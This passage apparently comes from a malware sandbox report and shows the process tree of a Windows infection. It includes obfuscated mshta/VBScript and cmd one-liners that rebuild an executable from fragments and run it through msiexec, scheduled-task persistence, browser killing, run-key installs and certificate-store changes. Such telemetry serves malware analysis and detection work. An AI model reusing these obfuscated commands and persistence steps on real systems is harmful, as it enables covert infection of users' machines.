                                                                                                                                                                                              PID:7600
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\bbcftid
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4324
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 444
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:8496
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                PID:7776
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                PID:8092
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                PID:4080
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                PID:6268
                                                                                                                                                                                              • C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
                                                                                                                                                                                                "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:6812
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\tjcftid
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  PID:2260
                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:68
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f0dc4460bc9.exe
                                                                                                                                                                                                  Sun03f0dc4460bc9.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:2444
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f0dc4460bc9.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f0dc4460bc9.exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:1424
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun038db98f99bf9a.exe
                                                                                                                                                                                                  Sun038db98f99bf9a.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:956
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\nRawPoCllpf61cTXEHawJdft.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\nRawPoCllpf61cTXEHawJdft.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5704
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\UIP82BvYQRyPuyjTWBt4azQR.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\UIP82BvYQRyPuyjTWBt4azQR.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:4760
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:6092
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:4852
                                                                                                                                                                                                    • C:\Users\Admin\Documents\zj4GKF4CmRymmDvwgoqsXw8J.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\zj4GKF4CmRymmDvwgoqsXw8J.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                      PID:3500
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\38ehYeJfqb9QiuWzhUvq2Txq.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\38ehYeJfqb9QiuWzhUvq2Txq.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4928
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\tcra60ub6jzqDEBAVpwBG4CK.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\tcra60ub6jzqDEBAVpwBG4CK.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:1576
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\NYdlHvzL7IF4mRvLbfKMAkSr.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\NYdlHvzL7IF4mRvLbfKMAkSr.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3360
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:3028
                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:4572
                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\p6hFV6TIPg0OUQFBBYucfPxc.exe
                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\p6hFV6TIPg0OUQFBBYucfPxc.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                            PID:4080
                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\g3AiunZbTCiUsqAqBgSCHkVL.exe
                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\g3AiunZbTCiUsqAqBgSCHkVL.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:3460
                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\iqpRKqVIC7H6G7J1v18JIgFY.exe
                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\iqpRKqVIC7H6G7J1v18JIgFY.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2044
                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\iqpRKqVIC7H6G7J1v18JIgFY.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\iqpRKqVIC7H6G7J1v18JIgFY.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:4888
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\iqpRKqVIC7H6G7J1v18JIgFY.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\iqpRKqVIC7H6G7J1v18JIgFY.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:1504
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:6068
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:2264
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                    PID:4392
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:3016
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:5832
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:5800
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:3236
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:4120
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:2708
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            taskkill -f -iM "iqpRKqVIC7H6G7J1v18JIgFY.exe"
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                            PID:4264
                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\uHBHUM3PTtzza3WHNjtLuApi.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\uHBHUM3PTtzza3WHNjtLuApi.exe"
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:4520
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:4852
                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\uHBHUM3PTtzza3WHNjtLuApi.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\uHBHUM3PTtzza3WHNjtLuApi.exe" -u
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:4188
                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\pibTRe29Qyd60wJ1KEXqCUSk.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\pibTRe29Qyd60wJ1KEXqCUSk.exe"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:4880
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-I2CS1.tmp\pibTRe29Qyd60wJ1KEXqCUSk.tmp
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-I2CS1.tmp\pibTRe29Qyd60wJ1KEXqCUSk.tmp" /SL5="$2042A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\pibTRe29Qyd60wJ1KEXqCUSk.exe"
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                PID:5500
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-LJDT1.tmp\ShareFolder.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-LJDT1.tmp\ShareFolder.exe" /S /UID=2709
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                  PID:2872
                                                                                                                                                                                                                                                  • C:\Program Files\Microsoft Office\UHWHYKLHRE\foldershare.exe
                                                                                                                                                                                                                                                    "C:\Program Files\Microsoft Office\UHWHYKLHRE\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:5240
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\b3-c82ea-62a-3d686-32a2ffff39ffc\Rabaehaexyvu.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\b3-c82ea-62a-3d686-32a2ffff39ffc\Rabaehaexyvu.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                      PID:4412
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\65-7a051-a94-1998a-8dbfcd57d6b37\Daebaeshocude.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\65-7a051-a94-1998a-8dbfcd57d6b37\Daebaeshocude.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:6212
                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xuokqro5.rvt\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:8032
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xuokqro5.rvt\GcleanerEU.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\xuokqro5.rvt\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                PID:8328
                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kl3iinxo.125\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:8124
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kl3iinxo.125\installer.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\kl3iinxo.125\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ehucj0xe.axb\any.exe & exit
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:2956
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ehucj0xe.axb\any.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ehucj0xe.axb\any.exe
                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                        PID:8544
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ehucj0xe.axb\any.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ehucj0xe.axb\any.exe" -u
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                            PID:9148
                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\py321rkx.xyz\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                          PID:4572
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\py321rkx.xyz\gcleaner.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\py321rkx.xyz\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                              PID:8628
                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kgzog44m.kgn\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:4724
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\kqVwMrX6Cj_wQZr2irH4cVRP.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\kqVwMrX6Cj_wQZr2irH4cVRP.exe"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:4172
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-IU8S8.tmp\kqVwMrX6Cj_wQZr2irH4cVRP.tmp
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-IU8S8.tmp\kqVwMrX6Cj_wQZr2irH4cVRP.tmp" /SL5="$30424,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kqVwMrX6Cj_wQZr2irH4cVRP.exe"
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:2220
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-J424E.tmp\ShareFolder.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-J424E.tmp\ShareFolder.exe" /S /UID=2710
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                            PID:5668
                                                                                                                                                                                                                                                                            • C:\Program Files\Windows Mail\MOCBUHKAJG\foldershare.exe
                                                                                                                                                                                                                                                                              "C:\Program Files\Windows Mail\MOCBUHKAJG\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:1976
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fb-d3177-305-e098e-2cea949bab53b\Jyroshuxewu.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\fb-d3177-305-e098e-2cea949bab53b\Jyroshuxewu.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                PID:6240
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\52-44599-ead-4d890-20186d5662552\Nufenuxazha.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\52-44599-ead-4d890-20186d5662552\Nufenuxazha.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:6292
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5p3yx2p.qry\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                      PID:4632
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\v5p3yx2p.qry\GcleanerEU.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\v5p3yx2p.qry\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                          PID:8104
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nt4gw5qe.p53\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                          PID:7648
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nt4gw5qe.p53\installer.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\nt4gw5qe.p53\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                            PID:8140
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nt4gw5qe.p53\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nt4gw5qe.p53\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635445502 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                PID:4384
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q2l1mhtm.a5c\any.exe & exit
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                              PID:7744
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\q2l1mhtm.a5c\any.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\q2l1mhtm.a5c\any.exe
                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                  PID:5804
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\q2l1mhtm.a5c\any.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\q2l1mhtm.a5c\any.exe" -u
                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                      PID:8348
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\baoqlsjh.b42\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                    PID:7896
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\baoqlsjh.b42\gcleaner.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\baoqlsjh.b42\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                        PID:3908
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q0tfoyme.wou\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                      PID:7976
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\A7b_FZRkEO6AdBgYiQsBKNsH.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\A7b_FZRkEO6AdBgYiQsBKNsH.exe"
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              PID:4636
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                PID:2948
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:6056
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x258,0x7ff8538fdec0,0x7ff8538fded0,0x7ff8538fdee0
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                        PID:8668
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
